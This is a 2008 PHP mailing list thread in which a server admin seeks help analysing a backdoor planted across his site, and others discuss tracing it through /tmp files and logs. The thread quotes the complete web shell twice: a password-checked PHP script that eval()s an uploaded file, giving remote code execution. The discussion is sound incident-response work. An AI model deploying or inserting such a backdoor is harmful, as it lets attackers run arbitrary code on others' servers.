Eric Butera wrote:
On Fri, Apr 18, 2008 at 12:58 PM, Jim Lucas <lists@xxxxxxxxx> wrote:
Eric Butera wrote:
On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:
I'm continuing to work on this.
One thing that seems obvious. The code executes the script code, using
eval(), directly from the /tmp dir. So the usual security tests we do
prior
to using move_uploaded_file() are useless.
Al wrote:
I'm still fighting my hack problem on one of my servers. Can anyone
help
me figure out what's the purpose of this code. The hack places this
file in
numerous dirs on the site, I assume using a php script because the owner
is
"nobody".
I can sort of figure what is doing; but, I can't figure out what the
hacker is using it for.
Incidentally, I've changed all passwords and restricted ftp to two
people.
I see no sign that any code is written with by site owner, i.e, ftp.
And,
I've looked carefully for suspect php files.
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t)
{
echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
"<pre>"; testdata('start'); if
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
testdata('end'); echo "</pre>"; ?>
<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
echo "$t\n";
} ;
function testdata($t)
{
say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],
"rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
} else
{
testdata('f');
} ;
} else
{
testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Maybe you can look at the file time on the script in /tmp and look at
server logs around that same time to see if that is any hint of where
it might have come from.
That won't work, the uploaded file is deleted after the
script/process/request is completed. Standard PHP clean would get rid of
it.
--
Jim Lucas
"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."
Twelfth Night, Act II, Scene V
by William Shakespeare
There is a file in /tmp that got created at some point by a request.
That request happened at a given time. That file got created at a
time. Even though the /tmp/dkhfsdfkh is gone the exploit is there. I
guess I don't know what else to say.
quote:http://us2.php.net/manual/en/features.file-upload.php
"The file will be deleted from the temporary directory at the end of the request
if it has not been moved away or renamed."
/quote
in the example code above that is injected into the top of the php scripts, the
eval is evaluating the code that is read from the temp file, the temp file is
never moved or renamed. There for it will be removed when the script is done.
--
Jim Lucas
"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."
Twelfth Night, Act II, Scene V
by William Shakespeare
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
